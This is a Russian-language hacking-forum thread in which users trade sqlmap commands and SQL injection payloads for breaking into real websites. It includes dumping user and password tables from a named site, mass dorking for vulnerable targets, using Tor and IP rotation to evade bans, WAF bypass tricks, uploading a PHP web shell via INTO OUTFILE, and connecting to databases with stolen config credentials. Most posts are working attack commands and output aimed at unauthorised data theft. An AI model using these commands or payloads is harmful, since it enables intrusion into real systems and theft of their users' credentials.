К примеру username и password, которые выводились вместе попадают совсем в разные места по id:
id: 231466888577923 => тут в value username
id: 258384382848014 => тут в value password, соотв username
Так что и вопрос...как сохранить данные нормально,а?


Это флаги мапа.. Попробуй запустить, оно не будет по новой сливать таблицу. Должно получиться.

Filipp said:
↑ (https://antichat.live/posts/3938858/)
Это флаги мапа.. Попробуй запустить, оно не будет по новой сливать таблицу. Должно получиться.


Я не делала дамп. Что я запущу по новой ? sql-shell? там пустой вывод, подключения к старому нет. Потратила день на это, золотая инфа, всё впустую. Не верится, что нет способа как-то вытащить из бд sqlite. Точнее, можно же! Не верится, что нет способа упорядочить инфу по внутр. предст-ю sqlmap

vikler said:
↑ (https://antichat.live/posts/3938968/)
Я не делала дамп. Что я запущу по новой ? sql-shell? там пустой вывод, подключения к старому нет. Потратила день на это, золотая инфа, всё впустую. Не верится, что нет способа как-то вытащить из бд sqlite. Точнее, можно же! Не верится, что нет способа упорядочить инфу по внутр. предст-ю sqlmap


Если ты ранее сливала эту инфу, как уже говорила, оно все пишет в sqlite файл. Потом если повторно обратится, оно уже не будет по новой вытягивать данные из БД, а будет брать из этого файла.

Как вариант, но наверное побывала уже


PHP:
-s SESSIONFILE Load session from a stored(.sqlite)file

AppS said:
↑ (https://antichat.live/posts/3939003/)
Как вариант, но наверное побывала уже

PHP:
-s SESSIONFILE Load session from a stored(.sqlite)file



Спасибо всем кто откликнулся. Помогло запуститься с флагом --offline (в новой версии мапа)

Для тех пишу, у кого может быть такая же проблема в будущем

http://screenshotuploader.com/i/1601/mxarr.png

Товарищии, как сделать полный пентест? Т.е без пропуска (skipping) risk-level поднять? Как это переменную правильно заюзать? Спасибо!

ol1ver said:
↑ (https://antichat.live/posts/3940395/)
http://screenshotuploader.com/i/1601/mxarr.png
Товарищии, как сделать полный пентест? Т.е без пропуска (skipping) risk-level поднять? Как это переменную правильно заюзать? Спасибо!


Да. Тогда оно будет проводить больше тестов. Ну а вообще, вроде ж скульмап спрашивает проводить дальше тест или нет. Сразу указывай в dbms mysql и левел подними насколько необходимо)

Filipp said:
↑ (https://antichat.live/posts/3940420/)
Да. Тогда оно будет проводить больше тестов. Ну а вообще, вроде ж скульмап спрашивает проводить дальше тест или нет. Сразу указывай в dbms mysql и левел подними насколько необходимо)


у меня не спрашивает(вроде как). Левел подними, как прописать то правильно? И какие пределы значения?

ol1ver said:
↑ (https://antichat.live/posts/3940552/)
у меня не спрашивает(вроде как). Левел подними, как прописать то правильно? И какие пределы значения?




--dbms=mysql --level 5

ms13 said:
↑ (https://antichat.live/posts/3940555/)
--dbms=mysql --level 5


можно еще --risk 3 добавить

0xrust said:
↑ (https://antichat.live/posts/3940617/)
можно еще
--risk 3
добавить


можно)

как сделать дамп бд с сохранением структуры таблиц.

Таблица 1 Таблица 2 Таблица 3

11111111 222222222 333333333

А не строчками,делаю дамп получается 11111111222222222333333333 - не очень удобно

Подскажите дамп открыл таблицу сразу а sqlmap перебирает по букве.Что я делаю не так?

sqlmap -u http://www.site.ru/showbanner.php?banner_id=' and [t] and '1'='1 --dbs

ms13 said:
↑ (https://antichat.live/posts/3942714/)
Извини, а это ты привёл пример той команды,которую ты вводишь в терминале?


да

А дампом могу только 50 к слить

ms13 said:
↑ (https://antichat.live/posts/3942751/)
Пробуй так!
sqlmap -u www.site.ru/showbanner.php?banner_id=X --dbs --no-cast (http://www.site.ru/showbanner.php?banner_id=)
где X - тот id, к которому ты сначала тыкал свою каывчку, больше ничего не надо, map сам всё подберёт!
Но учти, после этой команды ты лишь узнаешь кол-во и имена БД...


Ну так дорка у меня такая и есть без id

http://www.site.ru/showbanner.php?banner_id=' and [t] and '1'='1 --dbs

просто кавычка

ruslan0477 said:
↑ (https://antichat.live/posts/3942715/)
да
А дампом могу только 50 к слить


Пробуй так!

sqlmap -u www.site.ru/showbanner.php?banner_id=X (http://www.site.ru/showbanner.php?banner_id=X) --dbs --no-cast

где X - тот id, к которому ты сначала тыкал свою каывчку, больше ничего не надо, map сам всё подберёт!

Но учти, после этой команды ты лишь узнаешь кол-во и имена БД...

Далее узнаёшь кол-во и имена таблиц в нужной БД:

sqlmap -u www.site.ru/showbanner.php?banner_id=X (http://www.site.ru/showbanner.php?banner_id=X) -D Y --tables --no-cast

где Y - имя нужной БД.

После дампишь нужную тебе таблицу:

sqlmap -u www.site.ru/showbanner.php?banner_id=X (http://www.site.ru/showbanner.php?banner_id=X) -D Y -T Z --dump --no-cast

где Z - имя нужной таблицы

Иногда, если извлекается очень медленно, можно добавить ключ --threads 10 , например - те увеличить кол-во потоков.

ms13 said:
↑ (https://antichat.live/posts/3942767/)
Пробуй так!
sqlmap -u www.site.ru/showbanner.php?banner_id=X (http://www.site.ru/showbanner.php?banner_id=X) --dbs --no-cast
где X - тот id, к которому ты сначала тыкал свою каывчку, больше ничего не надо, map сам всё подберёт!
Но учти, после этой команды ты лишь узнаешь кол-во и имена БД...
Далее узнаёшь кол-во и имена таблиц в нужной БД:
sqlmap -u www.site.ru/showbanner.php?banner_id=X (http://www.site.ru/showbanner.php?banner_id=X) -D Y --tables --no-cast
где Y - имя нужной БД.
После дампишь нужную тебе таблицу:
sqlmap -u www.site.ru/showbanner.php?banner_id=X (http://www.site.ru/showbanner.php?banner_id=X) -D Y -T Z --dump --no-cast
где Z - имя нужной таблицы
Иногда, если извлекается очень медленно, можно добавить ключ
--threads 10
, например - те увеличить кол-во потоков.


C:\sqlmap.pyc sqlmap.pyc -u http://www.site.ru/showbanner.php?banner_id= -D sokulec_dev -T soku_member_14July2015 -C contact_email,password --dump Тоже самое.А таблицу я взял с дампера

[17:58:04] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Please retry with the switch '--text-only' (along with --technique=BU) as this case looks like a perfect candidate (low textual content along with inability of comparison engine to detect at least one dynamic parameter). Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')

Что бы это значило?

sqlmap -u www.sokule.com/showbanner.php?banner_id=1 (http://www.sokule.com/showbanner.php?banner_id=1) -D sokulec_dev -T soku_member_14July2015 --dump -C username,password --no-cast --threads 10

Всё там нормально извлекается, не морочь голову...

ruslan0477 said:
↑ (https://antichat.live/posts/3942789/)
[17:58:04] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Please retry with the switch '--text-only' (along with --technique=BU) as this case looks like a perfect candidate (low textual content along with inability of comparison engine to detect at least one dynamic parameter). Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
Что бы это значило?


--level 5 --risk 3

ruslan0477 said:
↑ (https://antichat.live/posts/3942775/)
C:\sqlmap.pyc sqlmap.pyc -u
http://www.site.ru/showbanner.php?banner_id=
-D sokulec_dev -T soku_member_14July2015 -C contact_email,password --dump Тоже самое.А таблицу я взял с дампера




the SQL query used returns 86951 entries

Чтобы не быть голословным...


ruslan0477 said:
↑ (https://antichat.live/posts/3942759/)
Ну так дорка у меня такая и есть без id



Ты спорить взялся, или совета просишь!?

Причём здесь твоя дорка? Не пойму никак...

Ну да ладно, всё получилось, все молодцы!

Как вытащить первые 10 записей из дампа?

коллеги, подскажие какой-нибудь софт для первичного анализа выдачи по доркам. Запускаю под тором sqlmap, начинаю с N-й страницы выдачи, ставлю на ночь - все равно мало сайтов хекается. Хотелось бы софтинку, которой дорк задаешь, она чекает за минуту пару сотен сайтов и выдает, допустим 20 уязвимых. Потом скармливаешь это sqlmap по списку. Кто что использует? Проблема большинства программ в том, что гугл выплевывать капчу начинает через через какое-то время. Есть может у кого-то софт который через какой-нибудь duckduckgo работает?

.Light. said:
↑ (https://antichat.live/posts/3943324/)
Как вытащить первые 10 записей из дампа?


limit 10,0

.Light. said:
↑ (https://antichat.live/posts/3943324/)
Как вытащить первые 10 записей из дампа?


--stop=10

уважаемые, вопрос. была уязвимостьь, ее прикрыли ну или по текущй ссылке она уже не доступна, поднял проверку до лвл 5 риск 3, нашел уязвимость пишет что таблица не достуна, что-то можно сделать?

Здравствуйте. Бывает когда делаю дамп таблицы с паролями вместо паролей непонятные строки (наверное в какой-то кодировке) вот пример:

\x9dęś\x8b\x0f§$(éę\x86ťšŻĹë

´Ë\x8cž\x04,ŹĆR|^\x85Ľ^\x14v

\x02Ő6N\x8důž@ůĺIžN\rN]

Кто-нибудь сталкивался? Как узнать нормальный пароль?

--sql-shell как его залить?

ruslan0477 said:
↑ (https://antichat.live/posts/3942694/)
Подскажите дамп открыл таблицу сразу а sqlmap перебирает по букве.Что я делаю не так?
sqlmap -u
http://www.site.ru/showbanner.php?banner_id=
' and [t] and '1'='1 --dbs


Не "скармливайте" sqlmap-у раскрученную иньекцию, он не поймет так как сам будет пробывать "крутить", запрос должен быть что-то типо "http://www.site.ru/showbanner.php?banner_id=123" обязательно вставьте существующий banner_id дабы sqlmap смог найти boolean based иньекцию

magichead said:
↑ (https://antichat.live/posts/3951911/)
--sql-shell как его залить?


SELECT 0xКод_скрипта_php_в_hex_который_ хотим_залить INTO OUTFILE "Полный/путь/к/файлу.php";

Но сколько я не пробовал, никогда не получалось.

vikler said:
↑ (https://antichat.live/posts/3952199/)
Подскажите как прогонять sqlmap чтобы менять айпи каждую секунду (ну или самое минимальное кол-во времени)
наверное --tor --tor-type=SOCKS5
но ещё какие-нибудь советы? Какие настройки в /etc/tor/torrc чтобы менять айпи максимально быстро? Нужны советы - очень злостный сайт, банит по айпи
ОС: ubuntu linux (для настроек tor)


как минимум можно попытаться использовать tamper скрипты и опцию --delay, для того чтобы попытаться избежать бана

если нужно ip менять то как вариант открыть контрол порт тора на который можно будет посылать запрос на смену цепочки нод а в sqlmap делать нечто вроде --eval="import os;os.system('тут команда которая говорит тору сменить цепочку')"

либо написать скрипт который каждые N минут/секунд меняет глобальные системные прокси

octer said:
↑ (https://antichat.live/posts/3952069/)
SELECT 0xКод_скрипта_php_в_hex_который_ хотим_залить INTO OUTFILE "Полный/путь/к/файлу.php";
Но сколько я не пробовал, никогда не получалось.


--os-shell это залить шелл а sql-shell это просто функция для удобства вы пишете запрос select user from dual а sqlmap сам его подгоняет под тип sql иньекции дабы не пришлось самому руками скажем выводить посимвольно если boolean или time based.

Setrus said:
↑ (https://antichat.live/posts/3953180/)
а sql-shell это просто функция


Но ведь с помощью неё можно залить php шелл, способом который я указал?

octer said:
↑ (https://antichat.live/posts/3953619/)
Но ведь с помощью неё можно залить php шелл, способом который я указал?


Да можно, не не тем методом который вы указали

GET /ad.php HTTP/1.1

Cookie: banner_xxx9=1; auth=hjefu7sci3os9heqgejp6f7gr2; lang=ru; rabotamd_ad=* SQL injection; banner=1; popup=1; pre_lang=ru; PHPSESSID=avqgopd70kth9gnhbutrj3qhu3; user_id=hjefu7sci3os9heqgejp6f7gr2; _ga=GA1.2.475953970.1455644353; _gat=1; FTID=1Mms8o1x-pLR1Mms8o; FTID=1Mms8o1x-pLR1Mms8o

X-Requested-With: XMLHttpRequest

Referer: ---------------

Host: ----------------

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*

что делать так нехочет

-r "C:\Users\doina\Desktop\88.txt" --eta --risk=3 --level=5 -dbs

rabotamd_ad=

уважаемые всем привет, вопрос в следующем я заметил что сайты сделанные на asp или aspx менее подвержены раскрутке чем те же написанные на php, может есть какие - то приемы что сможет облегчить раскрутку узвимостей для данных платформ?

BabaDook said:
↑ (https://antichat.live/posts/3953909/)
Да можно, не не тем методом который вы указали


Тогда пожалуйста скажите как правильно залить php шелл на сервер с помощью функции --sql-shell, а то у меня ни разу не получилось.

и сразу в догонку вопрос, есть уязвимость, есть ошибка в бд

вот такого плана:

Incorrect syntax near ', '.

Unclosed quotation mark after the character string ' ORDER BY createTime DESC'.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Incorrect syntax near ', '.

Unclosed quotation mark after the character string ' ORDER BY createTime DESC'.

Source Error:

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.

Stack Trace:

[SqlException (0x80131904): Incorrect syntax near ', '.

Unclosed quotation mark after the character string ' ORDER BY createTime DESC'.]

System.Data.SqlClient.SqlConnection.OnError(SqlExc eption exception, Boolean breakConnection, Action`1 wrapCloseInAction) +388

System.Data.SqlClient.TdsParser.ThrowExceptionAndW arning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) +717

System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) +4515

System.Data.SqlClient.SqlDataReader.TryConsumeMeta Data() +61

System.Data.SqlClient.SqlDataReader.get_MetaData() +134

System.Data.SqlClient.SqlCommand.FinishExecuteRead er(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) +6557689

System.Data.SqlClient.SqlCommand.RunExecuteReaderT ds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async, Int32 timeout, Task& task, Boolean asyncWrite, SqlDataReader ds) +6560327

System.Data.SqlClient.SqlCommand.RunExecuteReader( CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, TaskCompletionSource`1 completion, Int32 timeout, Task& task, Boolean asyncWrite) +586

System.Data.SqlClient.SqlCommand.RunExecuteReader( CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method) +104

System.Data.SqlClient.SqlCommand.ExecuteReader(Com mandBehavior behavior, String method) +288

System.Data.SqlClient.SqlCommand.ExecuteReader(Com mandBehavior behavior) +237

Baina.Library.Core.SqlDataContext.ExecuteReader(Co mmandType cmdType, String cmdText, IList`1 commandParameters) +251

Baina.Library.Core.EntityRepository`1.Query(ICrite ria criteria) +395

Baina.Flikie.Wallpaper.WallpaperService.QueryInter nal(String keyword, String resolution, Int32 contentLevel, String order, Int32 startIndex, Int32 resultSize) +134

Baina.Flikie.Wallpaper.WallpaperService.QueryFromC acheOrInternal(String keyword, String resolution, Int32 contentLevel, String order, Int32 sIndex, Int32 resultSize) +348

Baina.Flikie.Wallpaper.WallpaperService.Query(Stri ng keyword, String resolution, Int32 contentLevel, String order, Int32 startIndex, Int32 resultSize) +338

Baina.Flikie.Wallpaper.UserWallpaperService.QueryW allpaper(Int32 userId, String keyword, String resolution, Int32 contentLevel, String order, Int32 startIndex, Int32 resultSize) +87

Baina.Flikie.Web.MobileSite.Controllers.WallpaperC ontroller.GetWallpaperSearchResult(Int32 userId, String keywords) in D:\dolphin\Flikie\MobileSite\Controllers\Wallpaper Controller.cs:96

Baina.Flikie.Web.MobileSite.Controllers.WallpaperC ontroller.Index(Int32 id, String wallpaperName) in D:\dolphin\Flikie\MobileSite\Controllers\Wallpaper Controller.cs:132

lambda_method(Closure , ControllerBase , Object[] ) +167

System.Web.Mvc.ReflectedActionDescriptor.Execute(C ontrollerContext controllerContext, IDictionary`2 parameters) +247

System.Web.Mvc.ControllerActionInvoker.InvokeActio nMethod(ControllerContext controllerContext, ActionDescriptor actionDescriptor, IDictionary`2 parameters) +39

System.Web.Mvc.<>c__DisplayClassd.b__a() +120

System.Web.Mvc.ControllerActionInvoker.InvokeActio nMethodFilter(IActionFilter filter, ActionExecutingContext preContext, Func`1 continuation) +637

System.Web.Mvc.ControllerActionInvoker.InvokeActio nMethodWithFilters(ControllerContext controllerContext, IList`1 filters, ActionDescriptor actionDescriptor, IDictionary`2 parameters) +307

System.Web.Mvc.ControllerActionInvoker.InvokeActio n(ControllerContext controllerContext, String actionName) +720

System.Web.Mvc.Controller.ExecuteCore() +162

System.Web.Mvc.<>c__DisplayClass8.b__4() +58

System.Web.Mvc.Async.<>c__DisplayClass1.b__0() +15

System.Web.CallHandlerExecutionStep.System.Web.Htt pApplication.IExecutionStep.Execute() +606

System.Web.HttpApplication.ExecuteStep(IExecutionS tep step, Boolean& completedSynchronously) +288

но не критится, может я что не так делаю?

Octavian said:
↑ (https://antichat.live/posts/3953948/)
GET /ad.php HTTP/1.1
Cookie: banner_xxx9=1; auth=hjefu7sci3os9heqgejp6f7gr2; lang=ru; rabotamd_ad=* SQL injection; banner=1; popup=1; pre_lang=ru; PHPSESSID=avqgopd70kth9gnhbutrj3qhu3; user_id=hjefu7sci3os9heqgejp6f7gr2; _ga=GA1.2.475953970.1455644353; _gat=1; FTID=1Mms8o1x-pLR1Mms8o; FTID=1Mms8o1x-pLR1Mms8o
что делать так нехочет
-r "C:\Users\doina\Desktop\88.txt" --eta --risk=3 --level=5 -dbs


-u "site.com/ad.php" --cookie="rabotamd_ad= *" --level=5 --random-agent

У меня сразу два вопроса)

1)Хавиж показывает что в базе 40к строк,ставлю мапом на дамп - дампит только 400 строк и все!Как с этим бороться?

2)Почему иногда мап при дампе выдает пустоту не Null а просто пустая строчка- как с этим бороться?

Не получается слить пароли в нормальной кодировке, получаются вот такие:

[CODE]
Code:
+------------------------------------------+
| Password |
+------------------------------------------+
| \x00\x07\x8ccï\x8e\x1c°\x12\x1a\x89ÂÁr£¾ |
| \x00\t@ ÜáZ+Sxô\x0c\x82Ùp |
| \x00\x12\x87T\x9az¸ã

[QUOTE="demontager"]
demontager said:
↑ (https://antichat.live/posts/3954805/)
Не получается слить пароли в нормальной кодировке, получаются вот такие:
[CODE]
Code:
+------------------------------------------+
| Password |
+------------------------------------------+
| \x00\x07\x8ccï\x8e\x1c°\x12\x1a\x89ÂÁr£¾ |
| \x00\t@ ÜáZ+Sxô\x0c\x82Ùp |
| \x00\x12\x87T\x9az¸ã

Xsite said:
↑ (https://antichat.live/posts/3955009/)
Дб mssql ?


Так не хочет


Code:
[15:40:30] [CRITICAL] switch '--no-cast' is incompatible with switch '--hex'

Параметры сервера рапортует такие


Code:
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0

Ребят подскажите пожалуйста

В чем отличие ,если дампить с ключами -D olololo -T ololol -C username,password and etc --dump , сливает как обычно ,с небольшой скоростью

А если пробывать через --sql-shell с командами select * from ololol.ololol сливает все таблицу за пару секунд ,получалось такое на пару сайтов .Вот и хотелось бы узнать в чем отличие

Xsite said:
↑ (https://antichat.live/posts/3957036/)
Ребят подскажите пожалуйста
В чем отличие ,если дампить с ключами -D olololo -T ololol -C username,password and etc --dump , сливает как обычно ,с небольшой скоростью
А если пробывать через --sql-shell с командами select * from ololol.ololol сливает все таблицу за пару секунд ,получалось такое на пару сайтов .Вот и хотелось бы узнать в чем отличие


странный вопрос, во втором случае по факту прямой доступ к бд и одним запросом ты берешь все хотя и могут быть ограничения, а в первом тянется все кучей запросов последовательно

ol1ver said:
↑ (https://antichat.live/posts/3905201/)
Раз и вдруг sqlmap перестал работать. На ввод команд не реагирует. С Python все нормально, ничего не переносил. С АВ sqlmap дружил.
http://screenshotuploader.com/i/1510/bzm_t.png



лол на окнах извините, я использую переводчика

powerOfthemind said:
↑ (https://antichat.live/posts/3915354/)
sqlmap работает с XPATH syntax error ?


нет, но вы можете легко написать инъекции XPATH, если вы знаете язык сценариев и базы данных, если это SOAP вебсервис вы можете использовать библиотеку как handsoap и написать несколько полезных нагрузок вне для конкретной базы данных и запустить скрипт для приложений веб-вам безопасность на самом деле что-нибудь большой без какой-либо возможности программирования не может сделать.

Как раскрутить такую скулю?

site.ru/v2-live-with-a-5-1-win/

Acunetix:

Path Fragment (suffix /) input - was set to success' AND 3*2*1=6 AND '000CDY9'='000CDY9

site.ru/v2-live-with-a-5-1-win'%20AND%203*2*1%3d6%20AND%20'000SgxW'%3d'000Sgx W/

Возможно ли в Sqlmap сразу задать для целевого сайта готовый payload? Почитав руководство, ничего по этому поводу не нашёл, а было бы неплохо запустить сразу с параметром нужного пайлоада и сразу же приступить к раскрутке, и не ждать несколько часов, пока он его будет перебирать.

Грабитель said:
↑ (https://antichat.live/posts/3959701/)
Возможно ли в Sqlmap сразу задать для целевого сайта готовый payload? Почитав руководство, ничего по этому поводу не нашёл, а было бы неплохо запустить сразу с параметром нужного пайлоада и сразу же приступить к раскрутке, и не ждать несколько часов, пока он его будет перебирать.


можно указать какую базу использовать (--dbms), и тип уязвимости (--technique)

работу по готовому пайлоду не находил

Waki said:
↑ (https://antichat.live/posts/3959733/)
можно указать какую базу использовать (--dbms), и тип уязвимости (--technique)
работу по готовому пайлоду не находил


К сожалению, не то. Есть однотипные SQL иньекции в одном движке, но чтобы каждый URL засунуть в sqlmap, приходится ждать по нескольку часов пока он подберет под него тот же самый payload.

Пока что использую подмену url в sqlite файле для конкретного сайта в sqlmap, и думал может быть есть способ менее геморный... но видимо нету.

Ещё вопрос, столкнулся с непонятной вещью, когда из таблицы не получается извлечь никаких данных.

Вытаскиваю все базы данных, успешно вытаскиваются. Дальше вытаскиваю таблицы для конкретной базы данных, они тоже прекрасно вытаскиваются.

Но если я пытаюсь получить хоть какую то информацию из таблицы, то sqlmap не может ничего получить.

Банальный запрос --sql-query="select count(*) from my_database._my_table" и выдаёт ошибку:


Code:
[10:51:05] [INFO] retrieved:
[10:51:09] [WARNING] reflective value(s) found and filtering out
[10:51:24] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[10:52:30] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[10:52:34] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions

select count(*) from my_database._my_table: None

При этом все остальные запросы по типу select version() и так далее выполняются нормально, а при попытке получить информацию из таблицы или хотя бы количество записей, вот такая ошибка выскакивает.

Хмм, серьёзно, интересно. Запрос "select version()" выполняется нормально и выводит версию, а такой запрос: "select version() from information_schema.tables" возвращает none

На многих сайтах. И count(*) from base.table не срабатывает, так же выплёвывает или none или ошибки, если кто поможет, буду безумно рад.

После скана сайта на уязвимость, выдало такую инфу.


Code:
sqlmap identified the following injection point(s) with a total of 275 HTTP(s) requests:
---
Parameter: email (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: mailFlag=newsletter&email=QWln' AND (SELECT 5736 FROM(SELECT COUNT(*),CONCAT(0x716a717a71,(SELECT (ELT(5736=5736,1))),0x71717a6271,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Jdzw'='Jdzw
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0

и в target.txt такое


Code:
https://www.site.com/index.php?option=sentMail (POST)

mailFlag=newsletter&email=QWln

Как дальше раскручивать чтобы получить таблицы ? Интересует сам запрос sqlmap.py -u "" и что указывать.

Code:
-u "https://www.site.com/index.php?option=sentMail" --data="mailFlag=newsletter&email=1*" --dbs --tables

.Light. said:
↑ (https://antichat.live/posts/3958686/)
Как раскрутить такую скулю?
site.ru/v2-live-with-a-5-1-win/
Acunetix:
Path Fragment (suffix /) input
-
was set to
success' AND 3*2*1=6 AND '000CDY9'='000CDY9
site.ru/v2-live-with-a-5-1-win'%20AND%203*2*1%3d6%20AND%20'000SgxW'%3d'000Sgx W/




Code:
-u "site.ru/v2-live-with-a-5-1-win*" --dbs

grimnir said:
↑ (https://antichat.live/posts/3960089/)

Code:
-u "https://www.site.com/index.php?option=sentMail" --data="mailFlag=newsletter&email=1*" --dbs --tables



Почему вместо


Code:
mailFlag=newsletter&email=QWln

подставляется в POST


Code:
mailFlag=newsletter&email=1*

p.s. Базу сдампить вышло.

demontager said:
↑ (https://antichat.live/posts/3960370/)
Почему вместо

Code:
mailFlag=newsletter&email=QWln

подставляется в POST

Code:
mailFlag=newsletter&email=1*

p.s. Базу сдампить вышло.


Code:

mailFlag=newsletter&email=QWln

подставляется в POST

Code:

mailFlag=newsletter&email=1*

можно так

mailFlag=newsletter&email=*

А как можно искать уязвимости GET запросами ? Если в качестве цели указывать корневой URL. Допустим, если POST запросы, то я так делаю


Code:
sqlmap.py -u "site.com" --forms --crawl=3 --random-agent --tor --batch

И он сам уже ищет все доступные формы и пробует их на уязвимость.

Такой вопрос(ответа ненашол).Допустим имею доступ в админку сайта, можно её просканировать sqlmap на наличие иньекций, то есть можно ли авторизироватся через sqlmap в админке и начать поиск?

P.S посетила мысль что надо авторизироватся в браузере,взять куки и вставить их в sqlamp. Правельно я мыслю?Если да, то подскажите какими командами это можно сделать.

powerOfthemind said:
↑ (https://antichat.live/posts/3961450/)
Такой вопрос(ответа ненашол).Допустим имею доступ в админку сайта, можно её просканировать sqlmap на наличие иньекций, то есть можно ли авторизироватся через sqlmap в админке и начать поиск?
P.S посетила мысль что надо авторизироватся в браузере,взять куки и вставить их в sqlamp. Правельно я мыслю?Если да, то подскажите какими командами это можно сделать.


python sqlmap.py --help | grep cookie

--cookie=COOKIE HTTP Cookie header value

есть Blind иньекция, расскручивается очень долго!Можно какнибудь ускорить процесс? кроме --threads 10?

.Light. said:
↑ (https://antichat.live/posts/3965171/)
есть Blind иньекция, расскручивается очень долго!Можно какнибудь ускорить процесс? кроме --threads 10?


я бы лучше вместо --threads 10 сделал --delay 1, так как при большом количестве запросов есть немаленькая вероятность что тебя забанят, а то и багу прикроют

для sqlmap не нашел плагинов для ускорения блинда(

а так есть например ветка /threads/119047/(где (https://antichat.live/threads/119047/____/) то на рдоте вроде ещё был топик), нужный вектор можно заскриптовать

Вытащил с сайта config.php в нем есть данные подключения к БД.Но в поле хост "localhost" как можно подключиться к такой бд удаленно?

.Light. said:
↑ (https://antichat.live/posts/3967221/)
Вытащил с сайта config.php в нем есть данные подключения к БД.Но в поле хост "localhost" как можно подключиться к такой бд удаленно?


1й вариант - Сбрутить директорию на вхождение phpMyAdmin - залогиниться.

2й вариант - Набрать в cmd.exe ping ВАШ_ДОМЕН,узнали IP сервера - попробывали удаленно подключиться к mysql (не забываем port :3306 (обычно по дефолтку такой) ), подключиться можно с другого шелла.

3й вариант - узнать хостера, в гугле вбить его домен и префикс phpmyadmin (хостер дает общий доступ к phpmyadmin )

4й вариант - если vds то смотреть по дефолт url нахождения phpmyadmin.

+ МОЙ ВОПРОС

Уважаемые. Через sqlmap удалось раскрутить инъекцию. Вставил payload в браузер, все отлично выводится (DATABASE() и тп).

Пробую чекнуть на DBs и тп - не получается.

Потом понял что сам движок заменяет нижнее подчеркивание на символ запятая ( _ => ,) . Т.е никакие запросы с information_schema и тп не пройдут - отсюда и sqlmap ничего сделать не может (скриншот №1). Перевел в --sql-shell, пробую и такое (скриншот №2). Можно что придумать? Cпасибо.

ps. payload такой index.php?id=93) AND EXTRACTVALUE(1660,CONCAT(0x5c,0x71707a7671,(SELECT MID((DATABASE()),1,50)),0x716a627171)) AND (1749=1749

http://screenshotuploader.com/i/1603/juv0i.png

http://screenshotuploader.com/i/1603/1whpo.png

ol1ver said:
↑ (https://antichat.live/posts/3967606/)
1й вариант - Сбрутить директорию на вхождение phpMyAdmin - залогиниться.
2й вариант - Набрать в cmd.exe ping
ВАШ_ДОМЕН,
узнали IP сервера - попробывали удаленно подключиться к mysql (не забываем port :3306 (обычно по дефолтку такой) ), подключиться можно с другого шелла.
3й вариант - узнать хостера, в гугле вбить его домен и префикс phpmyadmin (хостер дает общий доступ к phpmyadmin )
4й вариант - если vds то смотреть по дефолт url нахождения phpmyadmin.
+ МОЙ ВОПРОС
Уважаемые. Через sqlmap удалось раскрутить инъекцию. Вставил payload в браузер, все отлично выводится (DATABASE() и тп).
Пробую чекнуть на DBs и тп - не получается.
Потом понял что сам движок заменяет нижнее подчеркивание на символ запятая (
_ => ,
) . Т.е никакие запросы с information_schema и тп не пройдут - отсюда и sqlmap ничего сделать не может (скриншот №1). Перевел в --sql-shell, пробую и такое (скриншот №2). Можно что придумать? Cпасибо.
ps. payload такой index.php?id=93
) AND EXTRACTVALUE(1660,CONCAT(0x5c,0x71707a7671,(SELECT MID((DATABASE()),1,50)),0x716a627171)) AND (1749=1749


"2й вариант - Набрать в cmd.exe ping ВАШ_ДОМЕН,узнали IP сервера - попробывали удаленно подключиться к mysql (не забываем port :3306 (обычно по дефолтку такой) ), подключиться можно с другого шелла." не факт что сработает, в конфиге же указано локалхост

про обход _ ничего не нашел, как вариант брутить таблицы руками

ещё советую попробовать добавить в запрос /*%00*/ или /*%0A*/ /*%0B*/ /*%0C*/ - может дурацкий реплейс завалится и не заменит _

t0ma5 said:
↑ (https://antichat.live/posts/3967896/)
"2й вариант - Набрать в cmd.exe ping
ВАШ_ДОМЕН,
узнали IP сервера - попробывали удаленно подключиться к mysql (не забываем port :3306 (обычно по дефолтку такой) ), подключиться можно с другого шелла." не факт что сработает, в конфиге же указано локалхост
про обход _ ничего не нашел, как вариант брутить таблицы руками
ещё советую попробовать добавить в запрос /*%00*/ или /*%0A*/ /*%0B*/ /*%0C*/ - может дурацкий реплейс завалится и не заменит _


Это на уровне движка замена идёт, смотрел код исходный

ol1ver said:
↑ (https://antichat.live/posts/3967903/)
Это на уровне движка замена идёт, смотрел код исходный


так и? оперторы замены/регулярки не всегда корректно отработают если есть символы переноса или нулл байт, проверьте /*%00*/ /*%0A*/ в запросе, это ведь не долго

ну то есть что то типа того

select /*%00*/table_name from information_schema.tables limit 1;

t0ma5 said:
↑ (https://antichat.live/posts/3967905/)
